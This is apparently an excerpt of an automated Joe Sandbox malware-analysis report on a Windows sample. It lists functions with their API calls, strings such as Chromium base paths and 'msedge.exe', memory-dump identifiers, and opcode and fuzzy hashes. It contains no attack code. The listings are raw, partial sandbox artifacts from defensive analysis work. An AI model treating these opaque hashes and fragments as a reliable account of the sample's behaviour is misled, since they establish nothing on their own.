                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CodePageValid
                                                  • String ID: utf8
                                                  • API String ID: 943130320-905460609
                                                  • Opcode ID: 18173ba87dd0c69caf9bce5d9ea2df418287b19ffba1f7ec4fccbc81ff4ca311
                                                  • Instruction ID: 46ca01adb72176ca46e3b805181760022cf683a6b3e620311005a70fc368cdb5
                                                  • Opcode Fuzzy Hash: 18173ba87dd0c69caf9bce5d9ea2df418287b19ffba1f7ec4fccbc81ff4ca311
                                                  • Instruction Fuzzy Hash: 59512636600305AAEB26AB75CC46BA677A8EF4D700F18C4A9F54EDB181F770E940C6B1
                                                  Function 00D3BED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D3BF17
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,000000FF), ref: 00D3C071
                                                    • Part of subcall function 00D3C4B0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,00000000,3BE85000,0000000A,DAFC8968,00D3F4F3,00D615E2), ref: 00D3C4CC
                                                    • Part of subcall function 00D3C4B0: AcquireSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D3C4FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: first
                                                  • API String ID: 1678258262-2456940119
                                                  • Opcode ID: 9248d1a74d227405dcd24f4367733cde2afea6572868b0af6933993207533b92
                                                  • Instruction ID: f5a557bd727e586a4101299bddef73c19fa921c232715479d7cc07d4a8df86c4
                                                  • Opcode Fuzzy Hash: 9248d1a74d227405dcd24f4367733cde2afea6572868b0af6933993207533b92
                                                  • Instruction Fuzzy Hash: 5251F331604342DBC718CF28C88066ABBE1FFC8364F18866DF9899B295D735E845CBA1
                                                  Function 00D3C340 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D3C366
                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D3C459
                                                    • Part of subcall function 00D3C4B0: TryAcquireSRWLockExclusive.KERNEL32(00DD40E0,00000000,3BE85000,0000000A,DAFC8968,00D3F4F3,00D615E2), ref: 00D3C4CC
                                                    • Part of subcall function 00D3C4B0: AcquireSRWLockExclusive.KERNEL32(00DD40E0), ref: 00D3C4FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID: first
                                                  • API String ID: 1678258262-2456940119
                                                  • Opcode ID: 0ec0eba8aac24c73e57c540342ce5bdf047043b5c65e79f0b96081451c094646
                                                  • Instruction ID: 7f82336742592461d911fe0091db54a53dac45688148abcf4b823d3f21841e25
                                                  • Opcode Fuzzy Hash: 0ec0eba8aac24c73e57c540342ce5bdf047043b5c65e79f0b96081451c094646
                                                  • Instruction Fuzzy Hash: 25315B726103028FD310DF29C845BB6B3A5EF88324F2CC278F5589B396DB75E9428761
                                                  Function 00D477E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 00D47948
                                                  • __Init_thread_header.LIBCMT ref: 00D4798A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CurrentInit_thread_headerProcess
                                                  • String ID: $di
                                                  • API String ID: 3343153627-4126818417
                                                  • Opcode ID: f940466d89f6c760b131dd5799208de00577b9431007699b130a789d44dc2cfa
                                                  • Instruction ID: 113feda6a2318dc866e5062cb9272a1a48b9d080979ce0ddfb11dfa117c737a6
                                                  • Opcode Fuzzy Hash: f940466d89f6c760b131dd5799208de00577b9431007699b130a789d44dc2cfa
                                                  • Instruction Fuzzy Hash: 2F415E72D0479A8BEB208F54DC41BFD7774FBD9310F14839AE89866291EB745A84CFA0
                                                  Function 00D796E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D7995F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ___except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3493665558-3733052814
                                                  • Opcode ID: 8cc4fbebc3868c98cf458780f0474ca21b508d4c1f9ad0e3f63cc032da7966b9
                                                  • Instruction ID: a19c4a544fc25a7e49df4b4e5f924939c2ebcd4fbbb114741200e0919b49ccef
                                                  • Opcode Fuzzy Hash: 8cc4fbebc3868c98cf458780f0474ca21b508d4c1f9ad0e3f63cc032da7966b9
                                                  • Instruction Fuzzy Hash: BC31A133501218DBDF268F54CC65AAAFBA5FF48325B18C55AFA4C49221E332D861DFA1
                                                  Function 00D297D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00D29871
                                                  Strings
                                                  • GetCurrentDirectoryW, xrefs: 00D29830
                                                  • ..\..\base\files\file_util_win.cc, xrefs: 00D2982B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW
                                                  • API String ID: 1611563598-3514530069
                                                  • Opcode ID: 4efd9c27798dce016ca5cdd7980daa3d6669f2bc9033695864d9c5446e85716e
                                                  • Instruction ID: 54f6ff98e4c555b8fceb5c1bac8507434e473295c8a9a34ebd1aa1584f6e8fd8
                                                  • Opcode Fuzzy Hash: 4efd9c27798dce016ca5cdd7980daa3d6669f2bc9033695864d9c5446e85716e
                                                  • Instruction Fuzzy Hash: 9F210AB2A187856BD230AB24DCC6AAFB358EFC4360F000B2DB596571C3EF70954886B1
                                                  Function 00D26390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000004,00000000,?,?,?,00000001), ref: 00D263FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID: ..\..\base\win\registry.cc$ReadValue
                                                  • API String ID: 3660427363-2708835790
                                                  • Opcode ID: c33016abdc7aea78c4ca567e637a92eb23342686ab74dbda7db98d7c54f5cacf
                                                  • Instruction ID: a9c88e2166035820a7498f065fe27404307a8f09df6f63a2e29db8362bf30a12
                                                  • Opcode Fuzzy Hash: c33016abdc7aea78c4ca567e637a92eb23342686ab74dbda7db98d7c54f5cacf
                                                  • Instruction Fuzzy Hash: 0611C071D0025DABDB10DBA8DC91EEEB778EF08B28F044229F5116B281D771A909CBB0
                                                  Function 00D58520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EventUnregister.ADVAPI32(?,?), ref: 00D58545
                                                  Strings
                                                  • Provider unregistration failure, xrefs: 00D5857D
                                                  • ..\..\base\trace_event\trace_logging_minimal_win.cc, xrefs: 00D5856B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: EventUnregister
                                                  • String ID: ..\..\base\trace_event\trace_logging_minimal_win.cc$Provider unregistration failure
                                                  • API String ID: 1359036815-2616656650
                                                  • Opcode ID: 14003e654cdc8889fc8e9d9911264b6d06d3e7521d870c03de4b6f69c88d0c02
                                                  • Instruction ID: 8eb32a7412a4b927e08f06b4f1aa005c996bf6b30521c85a2cb9961a10a46d78
                                                  • Opcode Fuzzy Hash: 14003e654cdc8889fc8e9d9911264b6d06d3e7521d870c03de4b6f69c88d0c02
                                                  • Instruction Fuzzy Hash: B5110470B003046BDB249F61D806B6B77E5AFC5300F44402CFD0AAB382EE75A909CBB1
                                                  Function 00D38DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(api-ms-win-downlevel-shell32-l1-1-0.dll,00000000,00000800), ref: 00D38E12
                                                  • CommandLineToArgvW.SHELL32(?,00000000), ref: 00D38E45
                                                  Strings
                                                  • api-ms-win-downlevel-shell32-l1-1-0.dll, xrefs: 00D38E0D
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ArgvCommandLibraryLineLoad
                                                  • String ID: api-ms-win-downlevel-shell32-l1-1-0.dll
                                                  • API String ID: 284269389-3716558642
                                                  • Opcode ID: 4ec2707624c885dd755ec2e2fbc168c1a68649fbdee7fb50830700d242f595fa
                                                  • Instruction ID: ffd2d9d89b7d510632cd8cbdd637d54c266c3d5e9f1f69edf6c73c2b392c4e7e
                                                  • Opcode Fuzzy Hash: 4ec2707624c885dd755ec2e2fbc168c1a68649fbdee7fb50830700d242f595fa
                                                  • Instruction Fuzzy Hash: C511F6B1A00319ABEB10DFA5DC45BAEB7B8FB48714F144129F905BB240DBB5A904DBB1
                                                  Function 00D298F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetCurrentDirectoryW.KERNEL32(00D43D92,?,00000000), ref: 00D29961
                                                  Strings
                                                  • ..\..\base\files\file_util_win.cc, xrefs: 00D29937
                                                  • SetCurrentDirectoryW, xrefs: 00D2993C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory
                                                  • String ID: ..\..\base\files\file_util_win.cc$SetCurrentDirectoryW
                                                  • API String ID: 1611563598-2135964009
                                                  • Opcode ID: fb74ff37838c82369214faf5c00bc86844a83787f9bf646af7ddbc78de8a6982
                                                  • Instruction ID: 6e9fc6751762aa953fbe3d5759ccbb8117d20417225ab5b6d0b3d87cc79c8d85
                                                  • Opcode Fuzzy Hash: fb74ff37838c82369214faf5c00bc86844a83787f9bf646af7ddbc78de8a6982
                                                  • Instruction Fuzzy Hash: 98019672A14385ABD3109F299C42A6EB768FFCA770F100B1DF5E5572C2EBB0994486F1
                                                  Function 00D46E00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_header.LIBCMT ref: 00D46E4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_header
                                                  • String ID: GetFileAttributesExFromAppW$msedge.exe
                                                  • API String ID: 3738618077-258447734
                                                  • Opcode ID: 1c314dea399d3a4e531ff9452210d3d3891e6515f8875d3664dd2b68edeaffcb
                                                  • Instruction ID: ca1b13a5f7544179dea9f7da599a3d72de47b5c77845ecc84e6087778c2fa785
                                                  • Opcode Fuzzy Hash: 1c314dea399d3a4e531ff9452210d3d3891e6515f8875d3664dd2b68edeaffcb
                                                  • Instruction Fuzzy Hash: AC01817A601201EFD7149F28EC55E6A7BA9FBC6720F14863AF90687741C731EC11CAB2
                                                  Function 00D45070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00D4507E
                                                  • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D4508A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: GetHandleVerifier
                                                  • API String ID: 1646373207-1090674830
                                                  • Opcode ID: 93c81cdb34f12dd31a75cd08582beec322a51813d64f60710e7fc7c449de7d13
                                                  • Instruction ID: 2168ba5198c59518bf004e2365eee6358ebda61e0bec04b3dd41a41869326dc1
                                                  • Opcode Fuzzy Hash: 93c81cdb34f12dd31a75cd08582beec322a51813d64f60710e7fc7c449de7d13
                                                  • Instruction Fuzzy Hash: 23D05B34249B04DBE6106BD0FC46B55375CB750716F540002F60ED51E6CBF0D41085B5

                                                  Executed Functions

                                                  Function 05241B30 Relevance: .2, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 703314428c404f08fff9bfbfcb96f2cd89be1079bdfac85cf0cb404dd1eb2263
                                                  • Instruction ID: 64477dddbf94677e5097db38ca1845077615abcecb01621f0c1cea304b3ce45c
                                                  • Opcode Fuzzy Hash: 703314428c404f08fff9bfbfcb96f2cd89be1079bdfac85cf0cb404dd1eb2263
                                                  • Instruction Fuzzy Hash: 4E7169706052428BE719CF29E8577457FA3FBA4324F268569F4418B3A6DB7C2887CF90
                                                  Function 05241B40 Relevance: .1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bcd65b72775ff760adb76d5f4b2e2221a6ead3415d9bc5631ef1499a94d71d1b
                                                  • Instruction ID: 924a2721bad417212dd5f3bb9083ea5a3673d380a97b8b8760bd339555e5e99c
                                                  • Opcode Fuzzy Hash: bcd65b72775ff760adb76d5f4b2e2221a6ead3415d9bc5631ef1499a94d71d1b
                                                  • Instruction Fuzzy Hash: F87169706052428BE719CF29E8977497FA3FBA4325F228569F4054B3A5DB7C2887CF90
                                                  Function 05241EB3 Relevance: 3.9, Strings: 3, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5240000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q$$]q$$]q
                                                  • API String ID: 0-4258901230
                                                  • Opcode ID: c5868105358f31da90a9317496ba8fd3986fd2e80f9bb8c8e1ea4059667c2c80
                                                  • Instruction ID: 774915032f0dae7bdf59e4910be109a1f1cf1b46ac2f1f2d020c45228e154206
                                                  • Opcode Fuzzy Hash: c5868105358f31da90a9317496ba8fd3986fd2e80f9bb8c8e1ea4059667c2c80
                                                  • Instruction Fuzzy Hash: 8A513B34B10105DFD718DB59D591A6ABBF2FF98314F248459E81AAB385CB3AAC43CF90
                                                  Function 05240E80 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2405310360.0000000005240000.00000040.00000800.00020000.00000000.sdmp, Offset: 05240000, based on PE: false
